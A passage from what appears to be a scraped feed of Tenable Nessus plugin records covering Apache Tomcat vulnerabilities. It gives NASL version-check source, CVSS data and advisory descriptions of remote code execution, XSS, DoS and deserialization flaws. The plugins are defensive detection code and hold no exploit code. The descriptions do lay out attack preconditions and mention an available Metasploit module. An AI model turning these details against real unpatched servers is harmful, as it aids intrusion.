script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-0232\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"os_fingerprint.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\", \"Host/OS\");\n\n exit(0);\n}\n\ninclude(\"tomcat_version.inc\");\n\n# Vuln only on Windows\nos = get_kb_item_or_exit('Host/OS');\nif ('Windows' >!< os) audit(AUDIT_OS_NOT, 'Windows', os);\n\nconf = get_kb_item('Host/OS/Confidence');\nif ((conf <= 70) && (report_paranoia < 2 )) \n{\n exit(1, 'Can\\'t determine the host\\'s OS with sufficient confidence and \\'show potential false alarms\\' is not enabled.');\n}\ntomcat_check_version(fixed: '9.0.19', min:'9.0.0.M1', severity:SECURITY_HOLE, granularity_regex: \"^9(\\.0)?$\", xss:TRUE);\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:52:34", "description": "The version of Tomcat installed on the remote Windows host is prior to 8.5.40. It is, therefore, affected by a remote code execution vulnerability due to a bug in the way the JRE passes command line arguments to Windows. An unauthenticated, remote attacker can exploit this to execute arbitrary commands. Additionally, it is affected by a cross-site (XSS) scripting vulnerability as the SSI printenv command echoes user provided data without proper escaping.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-16T00:00:00", "type": "nessus", "title": "Apache Tomcat 8.5.0 < 8.5.40 Remote Code Execution Vulnerability (Windows)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0221", "CVE-2019-0232"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_8_5_40.NASL", "href": "https://www.tenable.com/plugins/nessus/124063", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124063);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-0221\", \"CVE-2019-0232\");\n script_bugtraq_id(107906);\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Apache Tomcat 8.5.0 < 8.5.40 Remote Code Execution Vulnerability (Windows)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows Apache Tomcat server is affected by a remote code execution vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Tomcat installed on the remote Windows host is prior to 8.5.40. It is, therefore, affected by a remote\ncode execution vulnerability due to a bug in the way the JRE passes command line arguments to Windows. An \nunauthenticated, remote attacker can exploit this to execute arbitrary commands. \nAdditionally, it is affected by a cross-site (XSS) scripting vulnerability as the SSI printenv command echoes user\nprovided data without proper escaping.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/apache/tomcat/commit/5bc4e6d\");\n # https://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.5.40\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56c2ea9d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Tomcat version 8.5.40 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-0232\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"os_fingerprint.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\", \"Host/OS\");\n\n exit(0);\n}\n\ninclude('tomcat_version.inc');\n\n# Vuln only on Windows\nos = get_kb_item_or_exit('Host/OS');\nif ('Windows' >!< os) audit(AUDIT_OS_NOT, 'Windows', os);\n\nconf = get_kb_item('Host/OS/Confidence');\nif ((conf <= 70) && (report_paranoia < 2 )) \n{\n exit(1, 'Can\\'t determine the host\\'s OS with sufficient confidence and \\'show potential false alarms\\' is not enabled.');\n}\ntomcat_check_version(fixed: '8.5.40', min:'8.5.0', severity:SECURITY_HOLE, granularity_regex: \"^8(\\.5)?$\", xss:TRUE);\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:52:16", "description": "The version of Tomcat installed on the remote Windows host is prior to 7.0.94. It is, therefore, affected by a remote code execution vulnerability due to a bug in the way the JRE passes command line arguments to Windows. An unauthenticated, remote attacker can exploit this to execute arbitrary commands. Additionally, it is affected by a cross-site (XSS) scripting vulnerability as the SSI printenv command echoes user provided data without proper escaping.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-16T00:00:00", "type": "nessus", "title": "Apache Tomcat 7.0.0 < 7.0.94 Remote Code Execution Vulnerability (Windows)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0221", "CVE-2019-0232"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_7_0_94.NASL", "href": "https://www.tenable.com/plugins/nessus/124064", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124064);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-0221\", \"CVE-2019-0232\");\n script_bugtraq_id(107906);\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Apache Tomcat 7.0.0 < 7.0.94 Remote Code Execution Vulnerability (Windows)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows Apache Tomcat server is affected by a remote code execution vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Tomcat installed on the remote Windows host is prior to 7.0.94. It is, therefore, affected by a remote\ncode execution vulnerability due to a bug in the way the JRE passes command line arguments to Windows. An \nunauthenticated, remote attacker can exploit this to execute arbitrary commands. \nAdditionally, it is affected by a cross-site (XSS) scripting vulnerability as the SSI printenv command echoes user\nprovided data without proper escaping.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/apache/tomcat/commit/7f0221b\");\n # https://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.94\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?afa7a4e1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Tomcat version 7.0.94 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-0232\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"os_fingerprint.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\", \"Host/OS\");\n\n exit(0);\n}\n\ninclude('tomcat_version.inc');\n\n# Vuln only on Windows\nos = get_kb_item_or_exit('Host/OS');\nif ('Windows' >!< os) audit(AUDIT_OS_NOT, 'Windows', os);\n\nconf = get_kb_item('Host/OS/Confidence');\nif ((conf <= 70) && (report_paranoia < 2 )) \n{\n exit(1, 'Can\\'t determine the host\\'s OS with sufficient confidence and \\'show potential false alarms\\' is not enabled.');\n}\ntomcat_check_version(fixed: '7.0.94', min:'7.0.0', severity:SECURITY_HOLE, granularity_regex: \"^7(\\.0)?$\", xss:TRUE);\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-22T14:48:12", "description": "The HTTP/2 implementation in Apache Tomcat accepted streams with excessive numbers of SETTINGS frames and also permitted clients to keep streams open without reading/writing request/response data. By keeping streams open for requests that utilised the Servlet API's blocking I/O, clients were able to cause server-side threads to block eventually leading to thread exhaustion and a DoS. (CVE-2019-0199)\n\nThe SSI printenv command in Apache Tomcat echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website. (CVE-2019-0221)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-07-26T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : tomcat8 (ALAS-2019-1234)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0199", "CVE-2019-0221"], "modified": "2023-03-21T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:tomcat8", "p-cpe:/a:amazon:linux:tomcat8-admin-webapps", "p-cpe:/a:amazon:linux:tomcat8-docs-webapp", "p-cpe:/a:amazon:linux:tomcat8-el-3.0-api", "p-cpe:/a:amazon:linux:tomcat8-javadoc", "p-cpe:/a:amazon:linux:tomcat8-jsp-2.3-api", "p-cpe:/a:amazon:linux:tomcat8-lib", "p-cpe:/a:amazon:linux:tomcat8-log4j", "p-cpe:/a:amazon:linux:tomcat8-servlet-3.1-api", "p-cpe:/a:amazon:linux:tomcat8-webapps", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2019-1234.NASL", "href": "https://www.tenable.com/plugins/nessus/127062", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2019-1234.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(127062);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/21\");\n\n script_cve_id(\"CVE-2019-0199\", \"CVE-2019-0221\");\n script_xref(name:\"ALAS\", value:\"2019-1234\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Amazon Linux AMI : tomcat8 (ALAS-2019-1234)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The HTTP/2 implementation in Apache Tomcat accepted streams with\nexcessive numbers of SETTINGS frames and also permitted clients to\nkeep streams open without reading/writing request/response data. By\nkeeping streams open for requests that utilised the Servlet API's\nblocking I/O, clients were able to cause server-side threads to block\neventually leading to thread exhaustion and a DoS. (CVE-2019-0199)\n\nThe SSI printenv command in Apache Tomcat echoes user provided data\nwithout escaping and is, therefore, vulnerable to XSS. SSI is disabled\nby default. The printenv command is intended for debugging and is\nunlikely to be present in a production website. (CVE-2019-0221)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2019-1234.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Run 'yum update tomcat8' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-0221\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-el-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-jsp-2.3-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-servlet-3.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/07/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-8.5.42-1.80.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-admin-webapps-8.5.42-1.80.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-docs-webapp-8.5.42-1.80.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-el-3.0-api-8.5.42-1.80.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-javadoc-8.5.42-1.80.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-jsp-2.3-api-8.5.42-1.80.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-lib-8.5.42-1.80.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-log4j-8.5.42-1.80.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-servlet-3.1-api-8.5.42-1.80.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-webapps-8.5.42-1.80.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat8 / tomcat8-admin-webapps / tomcat8-docs-webapp / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:51:15", "description": "The remote SUSE Linux SLES11 host has packages installed that are affected by multiple vulnerabilities as referenced in the SUSE-SU-2020:14375-1 advisory.\n\n - The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.\n (CVE-2019-0221)\n\n - When Apache Tomcat 9.0.0.M1 to 9.0.28, 8.5.0 to 8.5.47, 7.0.0 and 7.0.97 is configured with the JMX Remote Lifecycle Listener, a local attacker without access to the Tomcat process or configuration files is able to manipulate the RMI registry to perform a man-in-the-middle attack to capture user names and passwords used to access the JMX interface. The attacker can then use these credentials to access the JMX interface and gain complete control over the Tomcat instance. (CVE-2019-12418)\n\n - When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if a) an attacker is able to control the contents and name of a file on the server; and b) the server is configured to use the PersistenceManager with a FileStore; and c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter=null (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control. Note that all of conditions a) to d) must be true for the attack to succeed. (CVE-2020-9484)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-10T00:00:00", "type": "nessus", "title": "SUSE SLES11 Security Update : tomcat6 (SUSE-SU-2020:14375-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0221", "CVE-2019-12418", "CVE-2020-9484"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:tomcat6", "p-cpe:/a:novell:suse_linux:tomcat6-admin-webapps", "p-cpe:/a:novell:suse_linux:tomcat6-docs-webapp", "p-cpe:/a:novell:suse_linux:tomcat6-javadoc", "p-cpe:/a:novell:suse_linux:tomcat6-jsp-2_1-api", "p-cpe:/a:novell:suse_linux:tomcat6-lib", "p-cpe:/a:novell:suse_linux:tomcat6-servlet-2_5-api", "p-cpe:/a:novell:suse_linux:tomcat6-webapps", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2020-14375-1.NASL", "href": "https://www.tenable.com/plugins/nessus/150581", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# SUSE update advisory SUSE-SU-2020:14375-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150581);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-0221\", \"CVE-2019-12418\", \"CVE-2020-9484\");\n script_xref(name:\"SuSE\", value:\"SUSE-SU-2020:14375-1\");\n script_xref(name:\"IAVB\", value:\"2019-B-0048-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0196\");\n script_xref(name:\"IAVA\", value:\"2020-A-0225-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0324\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"SUSE SLES11 Security Update : tomcat6 (SUSE-SU-2020:14375-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SLES11 host has packages installed that are affected by multiple vulnerabilities as referenced in\nthe SUSE-SU-2020:14375-1 advisory.\n\n - The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 echoes\n user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The\n printenv command is intended for debugging and is unlikely to be present in a production website.\n (CVE-2019-0221)\n\n - When Apache Tomcat 9.0.0.M1 to 9.0.28, 8.5.0 to 8.5.47, 7.0.0 and 7.0.97 is configured with the JMX Remote\n Lifecycle Listener, a local attacker without access to the Tomcat process or configuration files is able\n to manipulate the RMI registry to perform a man-in-the-middle attack to capture user names and passwords\n used to access the JMX interface. The attacker can then use these credentials to access the JMX interface\n and gain complete control over the Tomcat instance. (CVE-2019-12418)\n\n - When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to\n 7.0.103 if a) an attacker is able to control the contents and name of a file on the server; and b) the\n server is configured to use the PersistenceManager with a FileStore; and c) the PersistenceManager is\n configured with sessionAttributeValueClassNameFilter=null (the default unless a SecurityManager is used)\n or a sufficiently lax filter to allow the attacker provided object to be deserialized; and d) the attacker\n knows the relative file path from the storage location used by FileStore to the file the attacker has\n control over; then, using a specifically crafted request, the attacker will be able to trigger remote code\n execution via deserialization of the file under their control. Note that all of conditions a) to d) must\n be true for the attack to succeed. (CVE-2020-9484)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1136085\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1159723\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1171928\");\n # https://lists.suse.com/pipermail/sle-security-updates/2020-May/006850.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fec12574\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-0221\");\n 